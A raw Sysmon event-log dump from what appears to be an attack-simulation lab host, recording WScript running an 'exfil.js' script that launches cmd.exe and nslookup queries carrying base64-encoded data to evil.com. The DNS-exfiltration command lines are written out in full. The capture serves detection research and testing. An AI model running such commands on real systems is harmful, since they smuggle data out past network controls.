14:16:26.135{2E1864BB-17BA-629A-CC3F-000000005F02}49088048C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-CE3F-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.139{2E1864BB-17BA-629A-CE3F-000000005F02}1692C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-CC3F-000000005F02}4908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlecc.tmp 2>&1 10341000x8000000000000000198812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.119{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-CD3F-000000005F02}8040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.119{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-CD3F-000000005F02}8040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.104{2E1864BB-17BA-629A-CD3F-000000005F02}80407768C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-CC3F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.104{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CD3F-000000005F02}8040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.102{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.102{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.101{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.101{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CC3F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.100{2E1864BB-17A1-629A-783D-000000005F02}55522512C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-CC3F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.100{2E1864BB-17BA-629A-CC3F-000000005F02}4908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlecc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.081{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljstgy.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000198800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.697{00000000-0000-0000-0000-000000000000}1908<unknown process>-udptruefalse127.0.0.1-52538-false127.0.0.1-53domain 354300x8000000000000000198799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52537-false127.0.0.1-53domain 354300x8000000000000000198798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52537-false127.0.0.1-53domain 354300x8000000000000000198797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52536-false127.0.0.1-53domain 354300x8000000000000000198796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52536-false127.0.0.1-53domain 354300x8000000000000000198795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-52535-false127.0.0.1-53domain 354300x8000000000000000198794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.607{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-52535-false127.0.0.1-53domain 354300x8000000000000000198793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.544{00000000-0000-0000-0000-000000000000}336<unknown process>-udptruefalse127.0.0.1-52532-false127.0.0.1-53domain 354300x8000000000000000198792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udpfalsefalse127.0.0.1-52531-false127.0.0.1-53domain 354300x8000000000000000198791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udpfalsefalse127.0.0.1-52530-false127.0.0.1-53domain 354300x8000000000000000198790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udptruefalse127.0.0.1-52530-false127.0.0.1-53domain 354300x8000000000000000198789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udpfalsefalse127.0.0.1-52529-false127.0.0.1-53domain 354300x8000000000000000198788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.478{00000000-0000-0000-0000-000000000000}7584<unknown process>-udptruefalse127.0.0.1-52529-false127.0.0.1-53domain 354300x8000000000000000198787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-52528-false127.0.0.1-53domain 354300x8000000000000000198786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-52528-false127.0.0.1-53domain 354300x8000000000000000198785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-52527-false127.0.0.1-53domain 354300x8000000000000000198784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udpfalsefalse127.0.0.1-52526-false127.0.0.1-53domain 10341000x8000000000000000198783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-17BA-629A-CA3F-000000005F02}35484128C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-CB3F-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CB3F-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.066{2E1864BB-17BA-629A-C93F-000000005F02}11362536C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-CB3F-000000005F02}3504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.070{2E1864BB-17BA-629A-CB3F-000000005F02}3504C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-C93F-000000005F02}1136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljstgy.tmp 2>&1 10341000x8000000000000000198775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.050{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-CA3F-000000005F02}3548C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.050{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-CA3F-000000005F02}3548C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.035{2E1864BB-17BA-629A-CA3F-000000005F02}35484128C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-C93F-000000005F02}1136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CA3F-000000005F02}3548C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 